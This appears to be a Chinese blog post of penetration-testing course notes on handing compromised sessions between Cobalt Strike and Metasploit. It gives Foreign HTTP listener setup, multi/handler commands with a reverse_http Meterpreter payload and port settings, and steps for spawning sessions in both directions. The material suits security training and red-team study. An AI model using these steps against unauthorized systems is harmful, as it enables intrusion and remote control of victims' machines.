72内网安全-域横向CS&MSF联动及应急响应知识

拿到才行,拿不到就是多余的

案例一MSF&CobaltStrike 联动 Shell 

有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,

cs移交给msf

.创建Foreign监听器

“Listeners”“Add”,“Name”填“msf”(可随便填),“Payload”选“Foreign HTTP”,“HTTP Host(Stager)”填msf的IP地址,“HTTP Port(Stager)”端口自己设定 

协议不够的时候可以添加插件,

2.MSF监听模块设置对应地址端口

选择监听模块

    use exploit/multi/handler

设置payload,注意与CS保持一致

    set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

    set lhost 0.0.0.0

    set lport 6677

检查设置

    show options

执行

    exploit 

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键“Spawn”,选择刚才生成的监听器

稍等可在MSF上看见反弹结果,如果没有请检查网络 

然后选择自己想反弹的主机的shell。

会话就弹出来了

msf移交给cs

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的

进入相关模块,设置对应的东西,ip,端口,s4等等

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

就完成了上线

ping

an

  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值